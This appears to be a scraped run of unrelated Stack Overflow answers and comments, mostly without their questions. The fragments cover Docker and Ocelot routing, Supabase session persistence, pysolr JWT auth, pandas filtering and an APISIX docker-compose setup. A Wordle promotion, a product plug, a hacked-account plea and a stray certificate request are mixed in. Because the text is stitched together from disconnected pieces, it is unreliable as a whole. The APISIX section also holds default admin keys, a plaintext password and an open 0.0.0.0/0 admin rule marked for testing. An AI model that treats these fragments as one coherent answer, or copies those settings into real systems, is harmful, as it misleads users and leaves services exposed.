After the changes below, I am able to access the individual API directly and also via the Ocelot gateway using Docker.
- Removed the ports definition from docker-compose.yml
- In ocelot.json, set the service name as the host and 8080 as the port
- Exposed only port 8080 in the API's Dockerfile
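For illustration, a minimal docker-compose sketch of that setup (service and image names are assumptions, not from the original answer):

# Hypothetical compose file: no host "ports" mapping for the API;
# the gateway reaches it by service name on the internal network.
services:
  productservice:
    image: productservice:latest   # assumed image name
    expose:
      - "8080"                     # container port only, not published to the host
  ocelotgateway:
    image: ocelotgateway:latest    # assumed image name
    ports:
      - "5000:8080"                # only the gateway is published
    depends_on:
      - productservice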
Final ocelot.json
{
  "Routes": [
    {
      "DownstreamPathTemplate": "/api/products",
      "DownstreamScheme": "http",
      "DownstreamHostAndPorts": [
        {
          "Host": "productservice",
          "Port": 8080
        }
      ],
      "UpstreamPathTemplate": "/products",
      "UpstreamHttpMethod": [ "Get" ]
    }
  ]
}
Please check the documentation:
https://git-extensions-documentation.readthedocs.io/en/release-5.1/remote_feature.html#pull-changes
How can I change the CSV output such a way that it removes the trailing zeros and does not use exponential notation (without explicitly using Decimal(18,2) data type)?
Follow the steps below to get the expected output.
Step 1: Try using the following expression to achieve the expected results:
replace(toString(toDecimal(Data)),'.00','')

Step 2: I used the same sample data that you provided.
Step 3: Use the expression above in the derived column as required.
Step 4: The output is as expected per your requirement.

The colored "odoo" logo is in ~/odoo/addons/web/static/img/logo.png, if that is what you were looking for.
From the shelve documentation: use Shelf.close() when you want to close a shelf. flag='r' opens it read-only; flag='c' opens it for reading and writing, creating the file if it doesn't exist (the default); flag='w' opens an existing shelf for reading and writing; flag='n' always creates a new, empty shelf, open for reading and writing.
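A minimal sketch of those flags in use (the file name is illustrative):

import shelve

# flag='c' (the default): open for reading and writing, creating the file if needed
with shelve.open("cache.db", flag="c") as db:
    db["answer"] = 42

# flag='r': read-only; writes would raise an error
with shelve.open("cache.db", flag="r") as db:
    print(db["answer"])  # 42
# the `with` block calls Shelf.close() automatically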
What worked for me with a physical device:
Just invalidate caches in Android Studio:
File >> Invalidate Caches
In my case the issue was a wrong build command for Meson, i.e.:
meson setup build --reconfigure -Db_coverage=true -Dc_args=-Og,-w
is wrong, and should instead be:
meson setup build --reconfigure -Db_coverage=true -Dc_args=-Og
Adding the extra -w causes Meson to pass that -w to the default C compiler as a sanity test, which makes the compiler fail. Meson then decides that the compiler doesn't work and announces that the compiler for "c" is not specified for the host machine.
My recommendation is Mongoose for managing MongoDB in a NestJS project.
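A minimal sketch of wiring Mongoose into a NestJS module (the connection string is a placeholder; assumes @nestjs/mongoose and mongoose are installed):

// app.module.ts
import { Module } from '@nestjs/common';
import { MongooseModule } from '@nestjs/mongoose';

@Module({
  // connection string is a placeholder
  imports: [MongooseModule.forRoot('mongodb://localhost:27017/nest')],
})
export class AppModule {}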
The watermark logo is being set to a fixed size (100px 100px) using background-size, which can make it appear too large on smaller screens, especially mobile devices. To make the watermark responsive and keep it from being too big on small screens, you can use media queries and relative sizing; see the sketch below.
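For example, a hedged CSS sketch (the class name and sizes are assumptions, not from the original answer):

/* Scale the watermark relative to its container instead of a fixed 100px 100px */
.watermark {
  background-size: 20%;
}

/* Shrink it further on small screens */
@media (max-width: 600px) {
  .watermark {
    background-size: 12%;
  }
}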
Every day, I look forward to my quick mental workout on Wordle Today (https://wordletoday.cc/). It’s the perfect way to start my morning—simple, fun, and just the right amount of challenge.
Today’s puzzle had me stumped at first, but after a few strategic guesses ("CRANE," "SLICE," "THIEF"), I finally cracked it with "OLIVE"! That moment when all the tiles turn green is so satisfying.
If you haven’t tried Wordle Today yet, I highly recommend it. It’s a great way to sharpen your mind and have a little fun. Plus, it’s free and easy to play!
What was your Wordle Today experience? Share your results below! 🎉
Experiencing the same issue with .net 9 :-(
The process seems hard to solve; it needs a notification system.
The new Tailwind CSS version is currently not working. Install a different version of Tailwind and it will work.
I tried doing this, but every time I force quit the app and reopen it, the authentication does not persist
class SupabaseService {
  Future initialize() async {
    await Supabase.initialize(
      url: supabaseUrl,
      anonKey: supabaseKey,
    );
  }
}
// register the service
await locator<SupabaseService>().initialize();

// .. some code

if (!locator.isRegistered<SupabaseClient>()) {
  locator.registerLazySingleton<SupabaseClient>(
    () => Supabase.instance.client,
  );
}
I had managed to make it persist by using local storage: saving the persistSessionString and recovering it later. But now that I have upgraded my Flutter and Supabase versions, persistSessionString no longer exists.
String? sessionString =
    locator<SupabaseClient>().auth.currentSession?.persistSessionString;
// Add to local storage
// Get session string from local storage and recover session
await locator<SupabaseClient>().auth.recoverSession(sessionString);
Anyone got any ideas?
You can try to use:
'php_class_name' => self::class
Using this undocumented vc_map attribute allowed me to use a completely different class name inside a custom namespace.
source: https://stackoverflow.com/a/52983111/16246216
If the labels are not showing up, it may mean Fluent Bit's kubernetes filter is not configured correctly. You may need to manually enrich the events using a custom Lua filter if the default kubernetes metadata collection isn't sufficient.
Regarding your query about whether it requires direct calls to the Kubernetes API server via Lua scripts: yes, a Lua plugin would require direct API calls to the Kubernetes API server to fetch Job labels. But the Fluent Bit Lua filter plugin has some limitations; for example, it does not include the HTTP modules necessary to fetch job metadata from the Kubernetes API. To resolve this, you need to enrich the data through an external processor. Refer to the blog "How to configure Fluent Bit to collect logs for your K8s cluster" by Giulia Di Pietro, which should help resolve the issue.
Note: if you intend to use Lua to interact with the Kubernetes API directly, you will need to implement HTTP requests within Lua; however, this may require additional modules that aren't included in Fluent Bit's Lua plugin by default.
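For reference, a hedged sketch of the kubernetes filter with label enrichment enabled (classic config syntax; the values shown are typical, not from the original answer):

[FILTER]
    Name          kubernetes
    Match         kube.*
    Kube_URL      https://kubernetes.default.svc:443
    Merge_Log     On
    Labels        On
    Annotations   Off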
The formula should be dynamic based on your input value.
Change your formula to
formula = (x * 0.5/n) ** 2 + (y * 1.0/n) ** 2 - 1
This works fine
If you use a pyproject.toml file, you may prefer to list those filters there:
[tool.pytest.ini_options]
filterwarnings = [
    "ignore::DeprecationWarning"
]
Did you get a solution for this?
After researching and testing more, I managed to solve this problem by acquiring a Power Automate Premium license from my company and then removing and importing the package again. This way, all flows were turned on automatically after the import finished.
To my understanding, the majority of the flows required a Premium license because they used Dataverse as the trigger.
The deepcopy function from Python's copy module does not correctly copy Gym environments, because Gym environments often contain non-serializable objects such as file handles, sockets, or Cython objects that deepcopy cannot handle properly. Additionally, many Gym environments maintain internal state that references low-level C++ objects or uses external dependencies that do not support deep copying.
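A common workaround is to construct a fresh environment and re-seed it instead of deep-copying; a minimal sketch (environment id is illustrative):

import gymnasium as gym  # `import gym` on older installs

# Instead of copy.deepcopy(env), build a second instance and replay the seed
env = gym.make("CartPole-v1")
obs, info = env.reset(seed=42)

env_copy = gym.make("CartPole-v1")
obs_copy, info_copy = env_copy.reset(seed=42)  # same seed -> same start state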
This works with jjwt 0.12.5:
public Claims parseToken(String token) {
    return Jwts.parser().verifyWith(KEY).build().parseSignedClaims(token).getPayload();
}
Late answer, but yes, the whole system is not consistent all the time. Even though the commit commands are probably sent in parallel to all resources, some of them might take a bit longer to finalize their work, and locks might not be freed at exactly the same time.
Committing a message on a queue by the queue's resource manager might go faster than committing a bunch of SQL commands for a database resource manager, leading to a situation where a "listener" gets the message and reads "old" data from the database (in the next transaction).
I know that this particular issue has been solved by some by adding a relative time delay so that the message is not available to the "listener" immediately (a feature most queue managers support).
I have implemented a fully similar system. Below is a link to the full guidance:
After removing docker/network/files/local-kv.db and restarting Docker, Docker recreated the right pre-defined networks.
The root cause of this seems to be a customized filesystem mount-order problem; Docker's storage is configured to use a pluggable M.2 disk.
Did you find any solution to this problem? I now have the same issue.
When I change Any CPU to ARM64 it does not give an error, but is that the correct way? I also made all the changes in Xcode, removed all pairing files, and re-paired my Windows machine to the Mac.
I’m experiencing the same issue! It seems like SKPaymentQueue.defaultQueue.storefront.countryCode is cached. Even after changing the App Store country by switching Apple IDs, it still returns the wrong country code. Have you managed to solve this issue?
I was using the wrong address: it was localhost:8001/customer/1 instead of localhost:8001/customers/1.
I started solving the same problem yesterday. Did you manage to solve it somehow?
So I found a solution to this problem. It might not be pretty, but it works.
What I did is: I created a class named "JWTAuth" which extends the AuthBase class. When I instantiate the class, I pass the token. This way the auth parameter of pysolr receives an object and not a string, so it is happy.
from requests.auth import AuthBase
import pysolr

class JWTAuth(AuthBase):
    def __init__(self, jwt_token):
        self.jwt_token = jwt_token

    def __call__(self, r):
        r.headers['Authorization'] = f'Bearer {self.jwt_token}'
        return r

async def search(
    skip: int = 0,
    limit: int = 100,
    params: SearchQueryParams = Depends(),
) -> Any:
    """
    Search query.
    """
    zookeeper = pysolr.ZooKeeper("search-zoo1,search-zoo2,search-zoo3")
    solr = pysolr.SolrCloud(zookeeper, "tag", auth=JWTAuth(add-token-here))
    res = solr.search(q=params.query, start=skip, rows=limit)
    return SearchResults(data=res, count=res.hits)
This is the code that finally works.
theta should be the angle between the optic axis and the point on the image, so tan(theta) will be r/f, assuming r is the distance of the 2D point (on the image) from the center of the image. Looks like I got the core concept wrong in the original post.
img = cv2.imread(<impath>)[:, :, ::-1]
H, W, _ = img.shape
cX, cY = W // 2, H // 2  # 7, 5
f = min(cX, cY)

mapX = np.zeros((H, W))
mapY = np.zeros((H, W))
for x in range(W):
    for y in range(H):
        dx, dy = (x - cX), (y - cY)
        r = np.sqrt(dx**2 + dy**2)
        phi = np.arctan2(dy, dx)
        theta = np.arctan(r / f)
        rnew = f * theta
        xnew = cX + rnew * np.cos(phi)
        ynew = cY + rnew * np.sin(phi)
        mapX[H - 1 - int(ynew), int(xnew)] = H - 1 - y
        mapY[H - 1 - int(ynew), int(xnew)] = x

distorted = cv2.remap(np.array(img, "uint8"), np.array(mapY, "float32"), np.array(mapX, "float32"),
                      interpolation=cv2.INTER_LINEAR, borderMode=cv2.BORDER_CONSTANT)
Try this
npm install @rollup/rollup-win32-x64-msvc --save-dev
I made my day by myself :). Thanks All :)
npm i -D puppeteer
npm i -g bun #or npm i -g tsx
puppeteer browsers install chrome
touch open-inspector.ts # should contain the code listed below
chmod +x open-inspector.ts
./open-inspector.ts
Running with tsx/bunjs
file ./open-inspector.ts
#!/usr/bin/env bun
// or #!/usr/bin/env tsx
import puppeteer from 'puppeteer';
const browser = await puppeteer.launch({ headless: false, defaultViewport: null });
const page = (await browser.pages()).at(0);
await page.goto('chrome://inspect');
await page.waitForSelector('#node-frontend');
await page.click('#node-frontend');
await page.close();
no more questions - runs like a charm
The best way to match GitHub's exact styling is to first render the Markdown as HTML in a browser (e.g. using the markdown-viewer extension mentioned above) and then print it to PDF. This ensures the closest possible visual match. The downside, though, is that many print-to-PDF methods embed text as images, making it unselectable.
I was actually browsing SO for ideas to improve my Markdown-to-PDF extension, and your question stood out. Right now, I’m working on implementing code block rendering with proper syntax highlighting, and I hope to solve this without relying on image-based exports. I’ll also definitely add a theme chooser to make styling more flexible.
A bug was opened a while back addressing this issue. As you can see in the interactions, I ended up using another tool for the test I needed to write, but it seems that what caused the problem with Pact was having set file_write_mode to merge. It seems that, for some reason that couldn't be replicated, Pact retained this setting even after I had removed it from its initialization.
Add this plugin as well to your pom.xml:
<build>
    <plugins>
        <plugin>
            <groupId>org.apache.maven.plugins</groupId>
            <artifactId>maven-plugin-plugin</artifactId>
            <version>3.8.1</version>
        </plugin>
        <!-- Other Plugins -->
    </plugins>
</build>
The solution to the first problem was to give the parameters a value when calling the report and not to rely on the defined default value.
For the second problem, the solution was to swap their positions in the SQL query:
execute MyServer.MyDB.MyProc @Param2, @Param1, @Param3
Then @Param1 and @Param2 got the right values.
Save the image to the desired path:
docker save -o /home/myimage.tar myimage-app
Transfer it using SCP:
scp /home/myimage.tar root@SERVER_IP:/home/
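On the server, you can then load the image back; this step is not in the original answer but is the standard counterpart of docker save:

docker load -i /home/myimage.tar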
Please explain the process clearly; I am also trying to do the same thing.
We’ve built a Docusign VS Code Extension - an AI-powered assistant that helps with issues like this by guiding you through token generation, consent setup, and API orchestration - making the integration process easier.
We’re currently running a closed beta to gather feedback and improve the experience. If you're interested, you can sign up here.
For me, updating to the most recent version of the Python Debugger (ms-python.debugpy) extension (release 2025.4.1) solved the issue!
If your DMARC, SPF, or DKIM authentication is failing with a third-party mail service, check the following (illustrative DNS records follow the list):
SPF: Ensure your SPF record includes the third-party service's mail servers. Only one SPF record should be present in DNS.
DKIM: Verify that DKIM signing is enabled in your third-party provider settings and that the correct DKIM key is published in DNS.
DMARC: Confirm that your DMARC record is correctly set up and not enforcing a strict policy that could block unauthenticated emails.
Domain Alignment: Ensure the "From" domain matches the SPF or DKIM domain to pass DMARC alignment.
Email Headers: Check the email headers for SPF, DKIM, and DMARC results to identify where authentication is failing.
Third-Party Service Settings: Some providers require additional configuration—check their documentation for DMARC compliance.
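For the first three items, hedged example records (domain, selector, and include host are placeholders, not from the original answer):

example.com.                      TXT "v=spf1 include:_spf.thirdparty.com ~all"
selector1._domainkey.example.com. TXT "v=DKIM1; k=rsa; p=<public-key-from-provider>"
_dmarc.example.com.               TXT "v=DMARC1; p=none; rua=mailto:dmarc-reports@example.com"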
[FrameworkServlet.java:534] : Context initialization failed com.google.inject.internal.util.$ComputationException: java.lang.ArrayIndexOutOfBoundsException: 14659
We are facing the same issue while starting up the application.
We are using Java 11 to build the WAR file, and the same WAR file was deployed in dev2 and UAT. The same 7.8.8 branch deployed in Dev works fine; with 7.8.8 and 7.8.7 it is not working and we get the same issue.
There are no limits or quotas, but it would be practical to consider battery optimisation and system health
Can I ask what the results of this project were? I have nearly the same project as yours.
I had two classes, each with an @Setup creating its own ChromeDriver.
Then I made a WebDriverManager class with a singleton factory; a sketch is below. That did the trick!
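A minimal sketch of such a singleton factory (class and method names are my own, not the poster's exact code):

import org.openqa.selenium.WebDriver;
import org.openqa.selenium.chrome.ChromeDriver;

public final class WebDriverManager {
    private static WebDriver driver;

    private WebDriverManager() {}

    // Lazily create one shared ChromeDriver for all test classes
    public static synchronized WebDriver getDriver() {
        if (driver == null) {
            driver = new ChromeDriver();
        }
        return driver;
    }

    public static synchronized void quitDriver() {
        if (driver != null) {
            driver.quit();
            driver = null;
        }
    }
}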
Please show what error you are getting, and share the log for it.
-----BEGIN CERTIFICATE REQUEST-----
MIIC3zCCAccCAQAwgZkxFzAVBgNVBAMMDmtldmFsbiBbU3RhbXBdMRMwEQYDVQQF
Ewo0MTIwMDMyOTkxMRUwEwYDVQQKDAxHb3Zlcm5tZW50YWwxGzAZBgNVBAsMEtmH
2YTZiCDYr9ixINmH2YTZiDELMAkGA1UEBhMCSVIxEzARBgNVBAgMCtiq2YfYsdin
2YYxEzARBgNVBAcMCtiq2YfYsdin2YYwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAw
ggEKAoIBAQCqgwrMjfSKtIKWE1XNwklW6mCHYcwwc/A1rTZ2ejCHELWGUhYzbj6t
ijgE4iY3FGhytudzDBOVcbdQAhwpunnY14uAPu/UtGhuhPRxKcCmb+GopiY3umnN
LHPPcTgKUlQlUm4ytNDuFJ7GmRGQ/q4F+UR2hWQTQvGGvlHNa27zDpKQEPD/gxac
hogNJ0yb52JPJJSvxmD1Oqhu5dA2GT3MB90zqkdNDX7t8WSA0nB9kOGNoVMudq6b
4N02fYvZstZ0mIUPhqPJ97s4jKzKxu+0aNzJr+eRcj/tARAewdYdgua/htwHKq1F
CcBE6S48PHZTnNx1DOuPRPlEoHHzMrqrAgMBAAGgADANBgkqhkiG9w0BAQsFAAOC
AQEACW+LhlWgpD3P40j07UYZngsS9mv0rfAqGxSVV/G9sqn1mgcBqXG3Nxzd6iHE
XHQqOWYmZCioH5wC1umNawZ+EItDdbkJMlHlnjsx3nbOAAPg5fK3KBDAliPSgcaU
MTqn2oPqJIWFKZ4g0fQRXj33P6tCm1kFlRzrP92K3TLIg0BfFzDpPL2KWM58EmlN
CX/W34xKCZFAMCTwNLVHJpzY8dxv+waOStLFMYqjcBP8uKPIPir1bXaygihW5EB4
e1EFMdYqyysaDTgQP8RZTlha9EZbLIY8x0RstjXtCrx5aSptylHl5cXH89zQUjAh
G9EMLGBKqVL+/rLP/PzFGY2d3g==
-----END CERTIFICATE REQUEST-----
I was blind and now I see:
https://json-schema.org/draft-04/schema
This version is supported by this NuGet package, so no conditional is needed.
What an answer! It solves the problem (presumably) and creates a completely new one: how to create the settings file. Great!
Horrible, unhelpful waste of time of an answer; you might as well have kept it to yourself.
I wonder how we can iterate over other lines. Can you please give me an example of that?
I simplified all queries and went from fetching a few fields to fetching all of them. Now it seems to work. Really weird.
public function render()
{
    if (!$this->email) {
        abort(404);
    }

    $this->klant = VasteKlanten::where('email', $this->email)->first();

    if (!$this->klant) {
        $this->klant = Reserveringen::where('email', $this->email)
            ->orderBy('id', 'desc')
            ->first();
        $this->vaste_klant = false;
    }

    if ($this->klant) {
        $this->reserveringen = Reserveringen::where('email', $this->email)->get();
        $this->invitatie = NieuweKlanten::where('email', $this->klant->email)->get();
    }

    return view('livewire.beheer.klant-details');
}
As it turns out, the Jet driver has problems with the one-to-many field types... if you delete them, it works... for CRUD APIs...
In my case there was a problem with the async Main() method in the Program class. When I changed it to sync, the FolderBrowserDialog opened OK.
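For context, FolderBrowserDialog needs an STA thread, which a synchronous Main provides; a minimal sketch (assumes Windows Forms; the [STAThread] attribute is my addition, not confirmed as the poster's exact fix):

using System;
using System.Windows.Forms;

internal static class Program
{
    [STAThread]   // FolderBrowserDialog requires a single-threaded apartment
    static void Main()
    {
        using var dialog = new FolderBrowserDialog();
        if (dialog.ShowDialog() == DialogResult.OK)
        {
            Console.WriteLine(dialog.SelectedPath);
        }
    }
}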
Did you find any answer to this?
The line %matplotlib inline should be at the top of your script.
To resolve this, navigate to Debug > Windows > Modules, right-click GPNSAutomation.dll and select Load Symbols (Visual Studio 2022) to load the symbols manually.
By the way, this is not an error - it's merely a notification that the PDBs could not be loaded. You can read the Load symbols doc for more information.
Verify the column data type. Check that the column you are trying to update is actually of type int. It is possible that the column was defined with a type like varchar, char, or binary, which could have size limits.
I also had this problem, and it turned out that the path on my Windows machine exceeded the 256-character limit. The solution was to move the checked-out folder directly to C:\xyz.
In my case I deleted the lock file.
You can use google spreadsheets with Highcharts, please see the documentation with examples and link to the API: https://www.highcharts.com/docs/working-with-data/data-module
API: https://api.highcharts.com/highcharts/data.googleSpreadsheetKey
Just add width and height as attributes, not in style: <iframe class="map" width="510" height="510" src="https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d367298.85638395866!2d76.72027160297871!3d8.824467905511694!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3b05dc75a70fa0c3%3A0x5e9601dca63dd3fb!2sPMSA%20College%20kuttikadu%20kadakal!5e0!3m2!1sen!2sin!4v1643646588236!5m2!1sen!2sin"></iframe>
Hello, have you found a solution, brother?
-- Step 1: Add a new column with the required precision
-- Step 2: Copy data from the old column to the new column
-- Step 3: Drop the old column (only after verifying the data)
-- Step 4: Rename the new column to match the original column name
This worked in Oracle SQL Developer; a sketch of the statements is below.
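A hedged sketch of those four steps (table and column names are placeholders, not from the original answer):

ALTER TABLE my_table ADD (amount_new NUMBER(18,2));        -- Step 1
UPDATE my_table SET amount_new = amount;                   -- Step 2
ALTER TABLE my_table DROP COLUMN amount;                   -- Step 3 (after verifying the data)
ALTER TABLE my_table RENAME COLUMN amount_new TO amount;   -- Step 4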
You can show your Adaptive Cards inside the Telegram app during the user conversation. Anyway, that's not a question about native Telegram support.
Found this article useful in understanding this at a practical level. Re-reading the accepted answer after this made sense.
OK, I found the way to do that, using the following command:
npx create-vite@latest my-app-name --template react
You can also write it this way (this is TypeScript code):
const userSchema = new mongoose.Schema({
  username: String,
  email: String,
  password: String,
  firstname: String,
  lastname: String,
  mobile: {
    type: Number,
    validate: {
      validator: function (v: number) {
        // anchored \d pattern so the value must be exactly 10 digits
        return /^\d{10}$/.test(v.toString());
      },
      message: "mobile number must be exactly 10 digits",
    },
  },
});
The culprit for this was the log_subcmds option in sudoers, which itself uses ptrace and seccomp and has some documented limitations.
Thanks to DymOK on the TrueNAS forum who figured this out.
I face the same issues. Has anybody found any solutions?
I started a new project (MAUI, .NET 8) and changed the SVG files (colors, etc.). On Android everything works, but on iOS the purple .NET icon & splash screen remain the same when I run the app on a local device.
Has anybody resolved this?
Run and Debug -> uncheck Raised Exceptions and Uncaught Exceptions.
As a workaround I managed to use dynamic SQL:
CREATE OR REPLACE PROCEDURE p_json_test(v_id_1 NUMBER, v_id_2 NUMBER) IS
    v_sql VARCHAR2(4000);
BEGIN
    v_sql := 'INSERT INTO JSON_RESAULT_TABLE
              SELECT ID, JSON_OBJECT(*)
              FROM JSON_TABLE
              WHERE ID IN (:1, :2)';
    EXECUTE IMMEDIATE v_sql USING v_id_1, v_id_2;
END;
/

execute p_json_test(1, 2);
This approach solved the issue.
Is there any way to convert rdf:PlainLiteral to string? The exception is thrown by the SWRL built-ins.
My Facebook account is disabled. Please recover my ID; I didn't do anything. My account was hacked a few days earlier.
@christopher moore, thanks for your response
In my case (5.2.2), just replace 'cookie' with 'config' in config.inc.php and add two lines like below:
/* Authentication type */
$cfg['Servers'][$i]['auth_type'] = 'config';
$cfg['Servers'][$i]['user'] = 'root'; //add this line
$cfg['Servers'][$i]['password'] = 'root'; //add this line
For example, if you want to install, configure, and start fail2ban, this can be done in two ways.
The first one is to do it by making sub-tasks; a hedged sketch follows.
The other way is to make sub-roles.
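The original answer's examples were not included here; as an illustration of the sub-tasks approach only (module names are standard Ansible; the handler, file names, and Debian-style packaging are assumptions):

- name: Install fail2ban
  ansible.builtin.apt:
    name: fail2ban
    state: present

- name: Configure fail2ban
  ansible.builtin.copy:
    src: jail.local
    dest: /etc/fail2ban/jail.local
  notify: Restart fail2ban   # assumes a "Restart fail2ban" handler exists

- name: Ensure fail2ban is started and enabled
  ansible.builtin.service:
    name: fail2ban
    state: started
    enabled: true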
Haha....
The JSON was wrong:
{ title: "event2", start: "2025-03-15" }
In valid JSON the property names must be double-quoted: { "title": "event2", "start": "2025-03-15" }
I changed int argc, char *argv[] in the class constructor to int &argc, char **argv and everything worked.
I found this solution when I tried to create a second window of the application.
1. Canny edge detection
2. Template matching
3. Edge detection
4. Hough circle transform
These should work; a sketch of the Hough circle approach is below. Do let me know if you have any questions, cheers!
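A minimal OpenCV sketch of option 4 (file names and parameter values are illustrative, not from the original answer):

import cv2
import numpy as np

img = cv2.imread("coins.png")           # hypothetical input image
gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
gray = cv2.medianBlur(gray, 5)          # reduce noise before the transform
circles = cv2.HoughCircles(
    gray, cv2.HOUGH_GRADIENT, dp=1.2, minDist=30,
    param1=100, param2=50, minRadius=10, maxRadius=100,
)
if circles is not None:
    for x, y, r in np.round(circles[0]).astype(int):
        cv2.circle(img, (x, y), r, (0, 255, 0), 2)   # draw each detected circle
cv2.imwrite("detected.png", img)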
@Imran, how do I replicate the same Postman process in Python? I am not able to find proper documentation on using the ConfidentialClientApplication from MSAL.
Use the commands below in VS Code (PowerShell):
Remove-Item -Recurse -Force node_modules
Remove-Item -Force package-lock.json
npm install --legacy-peer-deps
NOTE: This will reset the installation and redownload the required packages.
The issue could also be a setting in VS Code that selects language-specific themes. You can change that in your settings.json.
The issue occurs because the original approach uses:
None
if df_obsFinding["Rejection_Comments"] is None
else df_obsFinding["Rejection_Comments"].apply(len) != 0
However, the condition df_obsFinding['Rejection_Comments'] is None does not check each row individually. Instead, it evaluates whether the entire column object is None, which will never be the case. As a result, the code proceeds to the else part and calls .apply(len). This iterates over the entire column, and when it encounters None values, it results in:
TypeError: object of type 'NoneType' has no len()
To fix this, we must check each element in the column individually using apply(lambda x: isinstance(x, list) and len(x) != 0):
df_ofComment = df_obsFinding.loc[
    (
        df_obsFinding["Comments"].apply(
            lambda x: isinstance(x, list) and len(x) != 0
        )
    )
    | (
        df_obsFinding["Rejection_Comments"].apply(
            lambda x: isinstance(x, list) and len(x) != 0
        )
    )
]
✅ isinstance(x, list) ensures x is a list before calling len(x), avoiding errors from None values.
✅ len(x) != 0 filters out empty lists.
✅ The logical OR (|) selects rows where either Comments or Rejection_Comments contain a non-empty list.
If Comments or Rejection_Comments might contain strings, we should also check for str:
df_ofComment = df_obsFinding.loc[
    (
        df_obsFinding["Comments"].apply(
            lambda x: isinstance(x, (list, str)) and len(x) != 0
        )
    )
    | (
        df_obsFinding["Rejection_Comments"].apply(
            lambda x: isinstance(x, (list, str)) and len(x) != 0
        )
    )
]
Note: This ensures the solution works even if Comments or Rejection_Comments contain strings instead of lists.
Input DataFrame
import pandas as pd

df_obsFinding = pd.DataFrame(
    data={
        "Post_Name": [
            "First Post",
            "Second Post",
            "Third Post",
            "Fourth Post",
            "Fifth Post",
        ],
        "Comments": [[], [1234], [1234], [], []],
        "Rejection_Comments": [None, [], [657], "Needs Review", [987]],
    }
)
Data Preview
| Post_Name | Comments | Rejection_Comments |
|---|---|---|
| First Post | [] | None |
| Second Post | [1234] | [] |
| Third Post | [1234] | [657] |
| Fourth Post | [] | Needs Review |
| Fifth Post | [] | [987] |
Filtered DataFrame (df_ofComment)
| Post_Name | Comments | Rejection_Comments |
|---|---|---|
| Second Post | [1234] | [] |
| Third Post | [1234] | [657] |
| Fourth Post | [] | Needs Review |
| Fifth Post | [] | [987] |
I'm having the same issue. I have set up Apache APISIX and its dashboard using Docker on Windows. The dashboard loads, but when I try to log in, it redirects back to the login page without any error message.
docker-compose.yml
services:
  apisix:
    image: apache/apisix:${APISIX_IMAGE_TAG:-3.11.0-debian}
    restart: always
    volumes:
      - ./apisix_conf/config.yaml:/usr/local/apisix/conf/config.yaml:ro
    depends_on:
      - etcd
    ##network_mode: host
    ports:
      - "9180:9180/tcp"
      - "9080:9080/tcp"
      - "9091:9091/tcp"
      - "9443:9443/tcp"
      - "9092:9092/tcp"
    networks:
      apisix:

  etcd:
    image: bitnami/etcd:3.5.11
    restart: always
    volumes:
      - etcd_data:/bitnami/etcd
    environment:
      ETCD_ENABLE_V2: "true"
      ALLOW_NONE_AUTHENTICATION: "yes"
      ETCD_ADVERTISE_CLIENT_URLS: "http://etcd:2379"
      ETCD_LISTEN_CLIENT_URLS: "http://0.0.0.0:2379"
    ports:
      - "2379:2379/tcp"
    networks:
      apisix:

  web1:
    image: nginx:1.19.0-alpine
    restart: always
    volumes:
      - ./upstream/web1.conf:/etc/nginx/nginx.conf
    ports:
      - "9081:80/tcp"
    environment:
      - NGINX_PORT=80
    networks:
      apisix:

  web2:
    image: nginx:1.19.0-alpine
    restart: always
    volumes:
      - ./upstream/web2.conf:/etc/nginx/nginx.conf
    ports:
      - "9082:80/tcp"
    environment:
      - NGINX_PORT=80
    networks:
      apisix:

  prometheus:
    image: prom/prometheus:v2.25.0
    restart: always
    volumes:
      - ./prometheus_conf/prometheus.yml:/etc/prometheus/prometheus.yml
    ports:
      - "9090:9090"
    networks:
      apisix:

  grafana:
    image: grafana/grafana:7.3.7
    restart: always
    ports:
      - "3000:3000"
    volumes:
      - "./grafana_conf/provisioning:/etc/grafana/provisioning"
      - "./grafana_conf/dashboards:/var/lib/grafana/dashboards"
      - "./grafana_conf/config/grafana.ini:/etc/grafana/grafana.ini"
    networks:
      apisix:

  dashboard:
    image: apache/apisix-dashboard:latest
    restart: always
    depends_on:
      - apisix
      - etcd
    volumes:
      - ./dashboard_conf/conf.yaml:/usr/local/apisix-dashboard/conf/conf.yaml:ro
    ports:
      - "9000:9000"
      - "9001:9001"
    networks:
      apisix:

networks:
  apisix:
    driver: bridge

volumes:
  etcd_data:
    driver: local
apisix_conf/config.yaml
apisix:
  node_listen: 9080            # APISIX listening port
  enable_ipv6: false
  enable_control: true
  control:
    ip: "0.0.0.0"
    port: 9092

deployment:
  admin:
    allow_admin:               # https://nginx.org/en/docs/http/ngx_http_access_module.html#allow
      - 0.0.0.0/0              # We need to restrict ip access rules for security. 0.0.0.0/0 is for test.
    admin_key:
      - name: "admin"
        key: edd1c9f034335f136f87ad84b625c8f1
        role: admin            # admin: manage all configuration data
      - name: "viewer"
        key: 4054f7cf07e344346cd3f287985e76a2
        role: viewer
  etcd:
    host:                      # it's possible to define multiple etcd hosts addresses of the same etcd cluster.
      - "http://etcd:2379"     # multiple etcd address
    prefix: "/apisix"          # apisix configurations prefix
    timeout: 30                # 30 seconds

plugin_attr:
  prometheus:
    export_addr:
      ip: "0.0.0.0"
      port: 9091
dashboard_conf/conf.yaml
conf:
  listen:
    host: 0.0.0.0
    port: 9000
  etcd:
    endpoints:
      - http://etcd:2379
  log:
    error_log:
      level: debug             # Change to "debug" to see more details
      file_path: /usr/local/apisix-dashboard/logs/error.log
    access_log:
      file_path: /usr/local/apisix-dashboard/logs/access.log

authentication:
  secret: secret_123           # secret for jwt token generation.
                               # NOTE: Highly recommended to modify this value to protect `manager api`.
                               # if it's default value, when `manager api` start, it will generate a random string to replace it.
  expire_time: 3600            # jwt token expire time, in second
  users:
    - username: admin          # username and password for login `manager api`
      password: admin123
In Windows, open Task Manager, end the tasks for adb.exe, restart your PC, then reopen Android Studio. That worked for me.
My solution was:
if (!app.Environment.IsProduction())
{
    app.Use((context, next) =>
    {
        context.Request.Scheme = "https";
        return next(context);
    });
}
In Windows, open Task Manager and end the tasks for adb.exe. I restarted my PC and that worked for me.
Simply restarting the laptop helped me. Not sure if there was some cache issue.
Following your feedback, I looked at ConsumeKafkaRecord, and I think that yes, you're right: I could apply the following flow: ConsumeKafkaRecord(ScriptedReader, CSVWriter) => MergeContent => UpdateAttribute => PutFile.
1/ In ConsumeKafkaRecord, I'd like to use a ScriptedReader to convert and modify the JSON message and a CSVWriter to write the new message.
2/ MergeContent to merge the flow files.
3/ UpdateAttribute to change the file name.
4/ PutFile to write the file.
The only problem is the header I want to write to the CSV file, as I only want one header.
Do you agree with this flow?
